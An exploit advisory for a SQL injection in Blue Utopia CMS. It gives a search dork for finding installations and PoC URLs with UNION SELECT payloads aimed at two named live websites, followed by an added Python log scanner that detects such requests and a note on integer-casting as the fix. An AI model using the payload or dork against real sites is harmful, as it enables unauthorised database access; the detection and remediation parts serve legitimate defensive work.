Blue Utopia CMS SQLi Vulnerability

[o] Blue Utopia CMS SQL Injection Vulnerability

Software : Blue Utopia CMS
Vendor : http://blueutopia.com/
Dork : "Powered by Blue Utopia"
Author : NoGe


[o] Exploit

http://localhost/[path]/index.php?page=news&full=[SQLi]


[o] PoC

http://www.geaugadems.org/index.php?page=news&full=-1071+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--
http://buetowforschoolboard.com/index.php?page=news&full=-2+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--
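The injection point above is the `full` parameter, which the application should only ever use as a numeric article id; the PoC replaces it with a negative id followed by a 15-column UNION SELECT. For a defender, the same fact gives a simple log check: any request to `index.php?page=news` whose `full` value is not a plain integer is off-spec, and one carrying `union ... select` is the payload shape shown in the PoC. The following Python is an added example, not part of the advisory or the vendor's code; the log lines, IP addresses and timestamps are constructed for illustration, and the field name `full` is the only thing taken from the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access-log lines (placeholder hosts and
# addresses, not systems from the advisory). Line 2 mirrors the PoC shape:
# a negative id followed by a 15-column UNION SELECT.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=news&full=42 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=news&full=-1071+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15-- HTTP/1.1" 200 6012 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?page=news&full=7%20AND%201=1 HTTP/1.1" 200 5123 "-" "curl/7.88"
203.0.113.2 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=about HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The only value the application should accept for an article id.
INT_RE = re.compile(r'^-?\d+$')
# UNION-based payloads: "union" followed later by "select", case-insensitive.
UNION_RE = re.compile(r'\bunion\b.*\bselect\b', re.IGNORECASE | re.DOTALL)


def classify_full_param(value: str) -> str:
    """Classify one decoded `full` value.

    'ok'          - a plain integer id, the only legitimate shape
    'union'       - contains UNION ... SELECT, the PoC payload shape
    'non-numeric' - anything else that should never reach an integer column
    """
    if INT_RE.match(value.strip()):
        return 'ok'
    if UNION_RE.search(value):
        return 'union'
    return 'non-numeric'


def scan_log(text: str) -> list:
    """Return one finding per `full=` value seen in the log text.

    parse_qs already URL-decodes the value (both '+' and %XX), so the
    classifier sees the same string the backend would have received.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        query = parse_qs(urlsplit(m.group('target')).query)
        if 'full' not in query:
            continue  # not a request to the injectable endpoint
        for value in query['full']:
            findings.append({
                'ip': m.group('ip'),
                'ts': m.group('ts'),
                'status': m.group('status'),
                'value': value,
                'verdict': classify_full_param(value),
            })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        if f['verdict'] != 'ok':
            print(f"{f['ts']} {f['ip']} {f['verdict']:12} full={f['value']!r}")
```

Only the two off-spec requests are printed; the integer id and the request without a `full` parameter are ignored. Note that a 200 status on the UNION line is consistent with the PoC, which returns the database name and version inside the normal page, so status-code filtering alone would miss it. The same integer rule is also the remediation on the application side: cast or bind `full` as an integer before it reaches the query, which is presumably what the vendor's fix mentioned below amounts to.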


[o] Note

this is a private script
all in one server
vendor already notified
bug has been fixed by vendor! :))